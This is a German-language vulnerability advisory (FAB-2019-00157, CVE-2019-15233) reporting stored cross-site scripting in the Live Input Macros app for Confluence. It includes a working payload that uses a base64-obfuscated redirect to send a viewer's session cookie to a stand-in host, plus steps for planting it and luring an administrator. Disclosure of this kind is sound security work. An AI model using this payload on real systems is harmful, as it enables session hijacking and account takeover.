
(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233
(FAB-2019-00157) Schwachstelle von mir entdeckt CVE-2019-15233
Advisory: Advisory
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
Diese Sicherheitslücke wurde von Francesco Emanuel Bennici [email protected] von der FABMation GmbH gefunden.
Live Input Macros gibt Benutzern die Möglichkeit, Checkboxen, Radio-Buttons, Dropdown-Listen und mehr zu Ihren Confluence-Seiten hinzuzufügen und Änderungen vorzunehmen, ohne die Seite bearbeiten zu müssen.
Ein Angreifer kann JavaScript-Code auf der Confluence-Seite ausführen, wenn ein Benutzer den schädlichen Code hinzufügt.
Dies kann verwendet werden, um das Session-Cookie eines (z.B.) Administrators zu stehlen (Session Hijacking).
Kopieren Sie diesen Inhalt:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
Erstellen Sie ein neues Element auf einer Confluence-Seite. Fügen Sie diesen Text ein und teilen Sie die Confluence-Seite mit (z.B.) einem Systemadministrator. Wenn er die Seite aufruft, können Sie seine Session hijacken/ "kopieren".